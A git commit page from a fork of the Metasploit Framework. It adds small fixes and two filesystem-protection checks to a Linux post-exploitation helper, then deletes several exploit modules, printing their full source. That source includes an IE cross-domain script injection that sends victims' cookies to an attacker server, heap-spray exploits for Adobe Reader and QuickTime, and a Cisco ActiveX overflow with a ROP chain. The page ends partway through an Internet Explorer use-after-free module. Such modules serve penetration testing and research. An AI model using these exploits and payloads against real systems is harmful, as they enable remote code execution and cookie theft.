dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Add new functions and fix return bugs

This commit is contained in:
cbrnrd 2018-04-11 10:47:21 -04:00
parent 57e243ac49
commit 1e34a6d3c6
21 changed files with 28 additions and 4434 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

36
lib/msf/core/post/linux/system.rb
View File

@ -111,7 +111,7 @@ module System
services = {}
begin
full = cmd_exec('netstat -tulpn')
raise "You must be root to get listening ports" if full =~ /\(No info could be read/
raise "You must be root to get listening ports" if full.include? '(No info could be read'
lines = full.split("\n").size
cmd = "netstat -tulpn | tail -n #{lines - 2}"
full = cmd_exec(cmd)
@ -122,7 +122,7 @@ module System
full.split("\n").each do |p|
ports << p.split('/')[1]
end
ports
return ports
else
full.split("\n").each do |s|
split = s.split('/')
@ -167,9 +167,9 @@ module System
cpuinfo = orig.split("\n\n")[0]
# This is probably a more platform independent way to parse the results (compared to splitting and assigning preset indices to values)
cpuinfo.split("\n").each do |l|
info[:speed_mhz] = l.split(': ')[1].to_i if l =~ /cpu MHz/
info[:product] = l.split(': ')[1] if l =~ /model name/
info[:vendor] = l.split(': ')[1] if l =~ /vendor_id/
info[:speed_mhz] = l.split(': ')[1].to_i if l.include? 'cpu MHz'
info[:product] = l.split(': ')[1] if l.include? 'model name'
info[:vendor] = l.split(': ')[1] if l.include? 'vendor_id'
end
info[:cores] = orig.split("\n\n").size
info
@ -237,7 +237,7 @@ module System
pids = []
full = cmd_exec('ps aux').to_s
full.split("\n").each do |pid|
pids << pid.split(' ')[1].to_i if pid =~ /#{program}/
pids << pid.split(' ')[1].to_i if pid.include? program
end
pids
end
@ -249,7 +249,7 @@ module System
def noexec?(mount_path)
mount = cmd_exec('cat /proc/mounts').to_s
mount.lines.each do |l|
true if l =~ Regexp.new("#{mount_path} (.*)noexec(.*)")
return true if l =~ Regexp.new("#{mount_path} (.*)noexec(.*)")
end
false
rescue
@ -263,13 +263,33 @@ module System
def nosuid?(mount_path)
mount = cmd_exec('cat /proc/mounts').to_s
mount.lines.each do |l|
true if l =~ Regexp.new("#{mount_path} (.*)nosuid(.*)")
return true if l =~ Regexp.new("#{mount_path} (.*)nosuid(.*)")
end
false
rescue
raise 'Unable to check for nosuid volume'
end
#
# Checks for protected hardlinks on the system
# @return [Boolean]
#
def protected_hardlinks?
read_file('/proc/sys/fs/protected_hardlinks').to_s.eql? '1'
rescue
raise 'Could not determine protected_hardlinks status'
end
#
# Checks for protected symlinks on the system
# @return [Boolean]
#
def protected_symlinks?
read_file('/proc/sys/fs/protected_symlinks').to_s.eql? '1'
rescue
raise 'Could not determine protected_symlinks status'
end
end # System
end # Linux

152
modules/auxiliary/gather/ie_uxss_injection.rb
View File

@ -1,152 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
def initialize(info={})
super(update_info(info,
'Name' => "MS15-018 Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection",
'Description' => %q{
This module exploits a universal cross-site scripting (UXSS) vulnerability found in Internet
Explorer 10 and 11. By default, you will steal the cookie from TARGET_URI (which cannot
have X-Frame-Options or it will fail). You can also have your own custom JavaScript
by setting the CUSTOMJS option. Lastly, you might need to configure the URIHOST option if
you are behind NAT.
},
'License' => MSF_LICENSE,
'Author' =>
[
'David Leo', # Original discovery
'filedescriptor', # PoC
'joev', # He figured it out really
'sinn3r' # MSF
],
'References' =>
[
[ 'CVE', '2015-0072' ],
[ 'OSVDB', '117876' ],
[ 'MSB', 'MS15-018' ],
[ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Feb/10' ]
],
'Platform' => 'win',
'DisclosureDate' => "Feb 1 2015"
))
register_options(
[
OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),
OptString.new('CUSTOMJS', [ false, 'Custom JavaScript' ])
])
end
def setup
if target_uri !~ /^http/i
raise Msf::OptionValidateError.new(['TARGET_URI'])
end
super
end
def target_uri
datastore['TARGET_URI']
end
def get_html
@html ||= html
end
def ninja_cookie_stealer_name
@ninja ||= "#{Rex::Text.rand_text_alpha(5)}.php"
end
def get_uri(cli=self.cli)
ssl = datastore["SSL"]
proto = (ssl ? "https://" : "http://")
if datastore['URIHOST']
host = datastore['URIHOST']
elsif (cli and cli.peerhost)
host = Rex::Socket.source_address(cli.peerhost)
else
host = srvhost_addr
end
if Rex::Socket.is_ipv6?(host)
host = "[#{host}]"
end
if datastore['URIPORT']
port = ':' + datastore['URIPORT'].to_s
elsif (ssl and datastore["SRVPORT"] == 443)
port = ''
elsif (!ssl and datastore["SRVPORT"] == 80)
port = ''
else
port = ":" + datastore["SRVPORT"].to_s
end
uri = proto + host + port + get_resource
uri
end
def server_uri
@server_uri ||= get_uri
end
def js
datastore['CUSTOMJS'] || %Q|var e = document.createElement('img'); e.src='#{server_uri}/#{ninja_cookie_stealer_name}?data=' + encodeURIComponent(document.cookie);|
end
def html
%Q|
<iframe style="display:none" src="#{get_resource}/redirect.php"></iframe>
<iframe style="display:none" src="#{datastore['TARGET_URI']}"></iframe>
<script>
window.onmessage = function(e){ top[1].postMessage(atob("#{Rex::Text.encode_base64(js)}"),"*"); };
var payload = 'window.onmessage=function(e){ setTimeout(e.data); }; top.postMessage(\\\\"\\\\",\\\\"*\\\\")';
top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","#{get_resource}/sleep.php",false),send();_.location="javascript:%22%3Cscript%3E'+ encodeURIComponent(payload) +'%3C%2Fscript%3E%22"');
</script>
|
end
def run
exploit
end
def extract_cookie(uri)
Rex::Text.uri_decode(uri.to_s.scan(/#{ninja_cookie_stealer_name}\?data=(.+)/).flatten[0].to_s)
end
def on_request_uri(cli, request)
case request.uri
when /redirect\.php/
print_status("Sending redirect")
send_redirect(cli, "#{datastore['TARGET_URI']}")
when /sleep\.php/
sleep(3)
send_response(cli, '')
when /#{ninja_cookie_stealer_name}/
data = extract_cookie(request.uri)
if data.blank?
print_status("The XSS worked, but no cookie")
else
print_status("Got cookie")
print_line(data)
report_note(
:host => cli.peerhost,
:type => 'ie.cookie',
:data => data
)
path = store_loot('ie_uxss_cookie', "text/plain", cli.peerhost, data, "#{cli.peerhost}_ie_cookie.txt", "IE Cookie")
vprint_good("Cookie stored as: #{path}")
end
else
print_status("Sending HTML")
send_response(cli, get_html)
end
end
end

220
modules/exploits/windows/browser/adobe_media_newplayer.rb
View File

@ -1,220 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'zlib'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Doc.media.newPlayer Use After Free Vulnerability',
'Description' => %q{
This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat
Professional versions up to and including 9.2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'unknown', # Found in the wild
# Metasploit version by:
'hdm',
'pusscat',
'jduck',
'jabra'
],
'References' =>
[
[ 'CVE', '2009-4324' ],
[ 'BID', '37331' ],
[ 'OSVDB', '60980' ],
[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-02.html' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
# test results (on Windows XP SP3)
# reader 6.0.1 - vulnerable / doesn't work
# reader 7.0.5 - untested
# reader 7.0.8 - untested
# reader 7.0.9 - vulnerable / doesn't work
# reader 7.1.0 - untested
# reader 7.1.1 - untested
# reader 8.0.0 - untested
# reader 8.1.1 - works
# reader 8.1.2 - untested
# reader 8.1.3 - untested
# reader 8.1.4 - untested
# reader 8.1.5 - untested
# reader 8.1.6 - untested
# reader 9.0.0 - untested
# reader 9.1.0 - works
# reader 9.2 - works (no debugger, no DEP)
[ 'Adobe Reader Windows English (JS Heap Spray)',
{
'Size' => (0x10000/2),
'Ret' => 0x0c0c0c0c
}
],
[ 'Adobe Reader Windows German (JS Heap Spray)',
{
'Size' => (0x10000/2),
'Ret' => 0x0a0a0a0a
}
],
],
'DisclosureDate' => 'Dec 14 2009',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Make some nops
nops = Rex::Text.to_unescape([target.ret].pack('V'))
# Randomize variables
#
len = 72
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
rand5 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
randnop = rand_text_alpha(rand(100) + 1)
vtbuf = [target.ret].pack('V') * 4
vtbuf << rand_text_alpha(len - vtbuf.length)
vtbuf.gsub!(/([dhHjmMsty])/m, '\\\\' + '\1')
retstring = Rex::Text.to_unescape(vtbuf)
# The printd strings are 72 bytes (??)
script = %Q|
var #{randnop} = "#{nops}";
var #{rand1} = unescape("#{shellcode}");
var #{rand2} = unescape(#{randnop});
var #{rand3} = unescape("#{retstring}");
while(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};
#{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);
memory=new Array();
for(i=0;i<0x2000;i++) { memory[i]= #{rand2} + #{rand1}; }
util.printd("#{rand4}", new Date());
util.printd("#{rand5}", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(#{rand3}, new Date());
|
# Create the pdf
pdf = make_pdf(script)
print_status("Sending #{self.name}")
send_response(cli, pdf, { 'Content-Type' => 'application/pdf' })
handler(cli)
end
def random_non_ascii_string(count)
result = ""
count.times do
result << (rand(128) + 128).chr
end
result
end
def io_def(id)
"%d 0 obj" % id
end
def io_ref(id)
"%d 0 R" % id
end
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
def n_obfu(str)
result = ""
str.scan(/./u) do |c|
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
result << "#%x" % c.unpack("C*")[0]
else
result << c
end
end
result
end
def ascii_hex_whitespace_encode(str)
result = ""
whitespace = ""
str.each_byte do |b|
result << whitespace << "%02x" % b
whitespace = " " * (rand(3) + 1)
end
result << ">"
end
def make_pdf(js)
xref = []
eol = "\x0d\x0a"
endobj = "endobj" << eol
pdf = "%PDF-1.5" << eol
pdf << "%" << random_non_ascii_string(4) << eol
xref << pdf.length
pdf << io_def(1) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(2) << n_obfu("/Pages ") << io_ref(3) << n_obfu("/OpenAction ") << io_ref(5) << ">>" << endobj
xref << pdf.length
pdf << io_def(2) << n_obfu("<</Type/Outlines/Count 0>>") << endobj
xref << pdf.length
pdf << io_def(3) << n_obfu("<</Type/Pages/Kids[") << io_ref(4) << n_obfu("]/Count 1>>") << endobj
xref << pdf.length
pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3) << n_obfu("/MediaBox[0 0 612 792]>>") << endobj
xref << pdf.length
pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << endobj
xref << pdf.length
compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
pdf << "stream" << eol
pdf << compressed << eol
pdf << "endstream" << eol
pdf << endobj
xrefPosition = pdf.length
pdf << "xref" << eol
pdf << "0 %d" % (xref.length + 1) << eol
pdf << "0000000000 65535 f" << eol
xref.each do |index|
pdf << "%010d 00000 n" % index << eol
end
pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
pdf << "startxref" << eol
pdf << xrefPosition.to_s() << eol
pdf << "%%EOF" << eol
end
end

299
modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
View File

@ -1,299 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({
# :os_name => OperatingSystems::Match::WINDOWS,
# :javascript => true,
# :rank => NormalRanking
#})
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability found in Apple QuickTime. When handling
a TeXML file, it is possible to trigger a stack-based buffer overflow, and then
gain arbitrary code execution under the context of the user. This is due to the
QuickTime3GPP.gtx component not handling certain Style subfields properly, as the
font-table field, which is used to trigger the overflow in this module. Because of
QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be
used to overflow, so at the moment DEP/ASLR bypass hasn't been provided. The module
has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).
},
'Author' =>
[
'Arezou Hosseinzad-Amirkhizi', # Vulnerability Discovery
'juan vazquez' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '87087' ],
[ 'CVE', '2012-3752' ],
[ 'BID', '56557' ],
[ 'URL', 'http://support.apple.com/kb/HT5581' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{
'Space' => 1000,
},
'Platform' => 'win',
'Targets' =>
[
# Tested with QuickTime 7.7.2
[ 'Automatic', {} ],
[ 'IE 6 on Windows XP SP3', {} ],
[ 'Firefox 3.5 on Windows XP SP3', {} ],
[ 'Firefox 3.5.1 on Windows XP SP3', {} ]
],
'Privileged' => false,
'DisclosureDate' => 'Nov 07 2012',
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
])
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
browser_name = ""
if agent =~ /MSIE/
browser_version = agent.scan(/MSIE (\d)/).flatten[0] || ''
browser_name = "IE #{browser_version}"
elsif agent =~ /Firefox\/3.5$/
browser_name = "Firefox 3.5 "
elsif agent =~ /Firefox\/3.5.1$/
browser_name = "Firefox 3.5.1"
elsif agent =~ /Opera\/9/
browser_name = "Opera"
end
case nt
when '5.1'
os_name = 'Windows XP SP3'
when '6.0'
os_name = 'Windows Vista'
when '6.1'
os_name = 'Windows 7'
end
targets.each do |t|
if (!browser_name.empty? and t.name.include?(browser_name)) and (!nt.empty? and t.name.include?(os_name))
print_status("Target selected as: #{t.name}")
return t
end
end
return nil
end
def on_request_uri(client, request)
return if ((p = regenerate_payload(client)) == nil)
agent = request.headers['User-Agent']
my_target = get_target(agent)
# Avoid the attack if no suitable target found
if my_target.nil?
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
return
end
if request.uri =~ /\.3gp/
print_status("Sending exploit TEXML (target: #{my_target.name})")
my_payload = "1" * (1024*16)
texml = <<-eos
<?xml version="1.0"?>
<?quicktime type="application/x-quicktime-texml"?>
<text3GTrack trackWidth="176.0" trackHeight="60.0" layer="1"
language="eng" timeScale="600"
transform="matrix(1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 1, 0, 1.0)">
<sample duration="2400" keyframe="true">
<description format="tx3g" displayFlags="ScrollIn"
horizontalJustification="Left"
verticalJustification="Top"
backgroundColor="0%, 0%, 0%, 100%">
<defaultTextBox x="0" y="0" width="176" height="60"/>
<fontTable>
<font id="1" name="Times"/>
</fontTable>
<sharedStyles>
<style id="1">
{font-table: #{my_payload}}
{font-style:normal}
{font-weight: normal}
{font-size: 10}
{line-height: 100%}
{text-align: right}
{text-decoration: underline}
{color: 100%, 100%, 100%, 100%}
{backgroundcolor: 100%, 100%, 100%, 100%}
</style>
</sharedStyles>
</description>
<sampleData scrollDelay="200"
highlightColor="25%, 45%, 65%, 100%"
targetEncoding="utf8">
<textBox x="10" y="10" width="156" height="40"/>
<text styleID="1">What you need... Metasploit!</text>
<highlight startMarker="1" endMarker="2"/>
<blink startMarker="3" endMarker="4"/>
</sampleData>
</sample>
</text3GTrack>
eos
send_response(client, texml, { 'Content-Type' => "application/x-quicktime-texml" })
else
print_status("Sending initial HTML")
url = ((datastore['SSL']) ? "https://" : "http://")
url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
url << ":" + datastore['SRVPORT'].to_s
url << get_resource
fname = rand_text_alphanumeric(4)
#ARCH used by the victim machine
arch = Rex::Arch.endian(my_target.arch)
nops = Rex::Text.to_unescape("\x0c\x0c\x0c\x0c", arch)
code = Rex::Text.to_unescape(payload.encoded, arch)
randnop = rand_text_alpha(rand(100) + 1)
# Spray puts payload on 0x31313131
if my_target.name =~ /IE/
spray = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{code}");
var #{randnop} = "#{nops}";
var nops = unescape(#{randnop});
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, 0x800 - code.length);
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var i=0; i < 1600; i++) {
heap_obj.alloc(block);
}
JS
#Use heaplib
js_spray = heaplib(spray)
#obfuscate on demand
if datastore['OBFUSCATE']
js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
js_spray.obfuscate(memory_sensitive: true)
end
else
js_spray = <<-JS
var shellcode = unescape("#{code}");
var #{randnop} = "#{nops}";
var bigblock = unescape(#{randnop});
var headersize = 20;
var slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
var fillblock = bigblock.substring(0,slackspace);
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
var memory = new Array();
for (i = 0; i < 750; i++){ memory[i] = block + shellcode }
JS
end
content = "<html>"
content << <<-JSPRAY
<head>
<script>
#{js_spray}
</script>
</head>
JSPRAY
content << "<body>"
content << <<-ENDEMBED
<OBJECT
CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
WIDTH="1"
HEIGHT="1"
CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">
<PARAM name="SRC" VALUE = "#{url}/#{fname}.3gp">
<PARAM name="QTSRC" VALUE = "#{url}/#{fname}.3gp">
<PARAM name="AUTOPLAY" VALUE = "true" >
<PARAM name="TYPE" VALUE = "video/quicktime" >
<PARAM name="TARGET" VALUE = "myself" >
<EMBED
SRC = "#{url}/#{fname}.3gp"
QTSRC = "#{url}/#{fname}.3gp"
TARGET = "myself"
WIDTH = "1"
HEIGHT = "1"
AUTOPLAY = "true"
PLUGIN = "quicktimeplugin"
TYPE = "video/quicktime"
CACHE = "false"
PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >
</EMBED>
</OBJECT>
ENDEMBED
content << "</body></html>"
send_response(client, content, { 'Content-Type' => "text/html" })
end
end
end
=begin
* Routine checking only for '1'-'9' chars for the vaules on the vulnerable style fields (font-table, font-size and line-height)
int __fastcall sub_67EED2B0(int a1, int a2)
{
int result; // eax@1
unsigned __int8 v3; // cl@2
for ( result = 0; ; ++result )
{
v3 = *(_BYTE *)a2++ - 0x30;
if ( v3 > 9u )
break;
}
return result;
}
=end

255
modules/exploits/windows/browser/cisco_playerpt_setsource.rb
View File

@ -1,255 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::Seh
#include Msf::Exploit::Remote::BrowserAutopwn
#
#autopwn_info({
# :ua_name => HttpClients::IE,
# :ua_minver => "6.0",
# :ua_maxver => "8.0",
# :javascript => true,
# :os_name => OperatingSystems::Match::WINDOWS,
# :classid => "{9E065E4A-BD9D-4547-8F90-985DC62A5591}",
# :method => "SetSource",
# :rank => NormalRanking
#})
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco Linksys PlayerPT ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability found in Cisco Linksys PlayerPT 1.0.0.15
as the installed with the web interface of Cisco Linksys WVC200 Wireless-G PTZ
Internet Video Camera. The vulnerability, due to the insecure usage of sprintf in
the SetSource method, allows to trigger a stack based buffer overflow which leads
to code execution under the context of the user visiting a malicious web page.
},
'Author' =>
[
'rgod', # Vuln discovery, PoC
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '80297' ],
[ 'EDB', '18641' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => "\x00\x0d\x0a\x5c",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'Platform' => 'win',
'Targets' =>
[
# Cisco Linksys PlayerPT ActiveX Control 1.0.0.15
[ 'Automatic', { } ],
[
'IE 6 on Windows XP SP3',
{
'Spray' => true,
'SprayBlocks' => 0x185,
'SprayOffset' => '0x0',
'OffsetStackBottom' => 8556
}
],
[
'IE 7 on Windows XP SP3 / Windows Vista SP2',
{
'Spray' => true,
'SprayBlocks' => 0x185,
'SprayOffset' => '0x0',
'OffsetStackBottom' => 3220
}
],
[
'IE 8 on Windows XP SP3',
{
'Spray' => false,
'OffsetRop' => 160,
'Offset' => 456,
'Ret' => 0x1002c536, # ADD ESP,0A2C # RETN from PlayerPT.ocx
'OffsetStackBottom' => 4108
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Mar 22 2012',
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
], self.class
)
end
def get_spray(t, js_code, js_nops)
randnop = rand_text_alpha(rand(100) + 1)
spray = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var #{randnop} = "#{js_nops}";
var nops = unescape(#{randnop});
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{t['SprayOffset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var z=1; z < #{t['SprayBlocks']}; z++) {
heap_obj.alloc(block);
}
JS
return spray
end
# rop chain generated with mona.py
def create_rop_chain()
rop_gadgets =
[
0x77c2f271, # POP EBP # RETN [msvcrt.dll]
0x77c2f271, # skip 4 bytes [msvcrt.dll]
0x77c5335d, # POP EBX # RETN [msvcrt.dll]
0xffffffff, #
0x77c127e1, # INC EBX # RETN [msvcrt.dll]
0x77c127e1, # INC EBX # RETN [msvcrt.dll]
0x77c4e392, # POP EAX # RETN [msvcrt.dll]
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77c34de1, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
0x77c479e2, # POP EDI # RETN [msvcrt.dll]
0x77c39f92, # RETN (ROP NOP) [msvcrt.dll]
0x77c3b8ba, # POP ESI # RETN [msvcrt.dll]
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
0x77c4e392, # POP EAX # RETN [msvcrt.dll]
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c51025, # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")
return rop_gadgets
end
def get_payload(my_target)
case my_target.name
when /IE 6 on Windows XP SP3/
my_payload = "\x0c" * my_target['OffsetStackBottom']
return my_payload
when /IE 7 on Windows XP SP3 \/ Windows Vista SP2/
my_payload = "\x0c" * my_target['OffsetStackBottom']
return my_payload
when /IE 8 on Windows XP SP3/
my_payload = rand_text_alpha(my_target['OffsetRop'])
my_payload << create_rop_chain
my_payload << make_nops(my_target['Offset'] - my_payload.length)
my_payload << generate_seh_record(my_target.ret)
my_payload << payload.encoded
my_payload << rand_text_alpha(my_target['OffsetStackBottom'] - my_payload.length)
return my_payload
end
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
return targets[1] #IE 6 on Windows XP SP3
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
return targets[2] #IE 7 on Windows XP SP3
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
return targets[3] #IE 8 on Windows XP SP3
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
return targets[2] #IE 7 on Windows Vista SP2
else
return nil
end
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
print_status("User-agent: #{agent}")
my_target = get_target(agent)
# Avoid the attack if the victim doesn't have a setup we're targeting
if my_target.nil?
print_error("Browser not supported: #{agent}")
send_not_found(cli)
return
end
js = ""
if my_target['Spray']
p = payload.encoded
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
js = get_spray(my_target, js_code, js_nops)
js = heaplib(js, {:noobfu => true})
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate(memory_sensitive: true)
end
end
sploit = get_payload(my_target)
sploit = sploit.gsub(/"/, "\\\"")
html = <<-MYHTML
<html>
<head>
<script>
#{js}
</script>
</head>
<body>
<object classid='clsid:9E065E4A-BD9D-4547-8F90-985DC62A5591' id='obj' /></object>
<script>
obj.SetSource("","","","","#{sploit}");
</script>
</body>
</html>
MYHTML
html = html.gsub(/^ {4}/, '')
print_status("Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end

286
modules/exploits/windows/browser/ie_cbutton_uaf.rb
View File

@ -1,286 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({
# :ua_name => HttpClients::IE,
# :ua_minver => "8.0",
# :ua_maxver => "8.0",
# :javascript => true,
# :os_name => OperatingSystems::Match::WINDOWS,
# :rank => GoodRanking
#})
def initialize(info={})
super(update_info(info,
'Name' => "MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in Microsoft Internet Explorer. A
use-after-free condition occurs when a CButton object is freed, but a reference
is kept and used again during a page reload, an invalid memory that's controllable
is used, and allows arbitrary code execution under the context of the user.
Please note: This vulnerability has been exploited in the wild targeting
mainly China/Taiwan/and US-based computers.
},
'License' => MSF_LICENSE,
'Author' =>
[
'eromang',
'mahmud ab rahman',
'juan vazquez', #Metasploit
'sinn3r', #Metasploit
'Peter Vreugdenhil' #New trigger & new exploit technique
],
'References' =>
[
[ 'CVE', '2012-4792' ],
[ 'OSVDB', '88774' ],
[ 'US-CERT-VU', '154201' ],
[ 'BID', '57070' ],
[ 'MSB', 'MS13-008' ],
[ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],
[ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ],
[ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ],
[ 'URL', 'http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012' ]
],
'Payload' =>
{
'BadChars' => "\x00",
'Space' => 1024,
'DisableNops' => true
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],
[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],
[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],
[ 'IE 8 on Windows 7', { 'Rop' => :jre } ]
],
'Privileged' => false,
'DisclosureDate' => "Dec 27 2012",
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
])
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
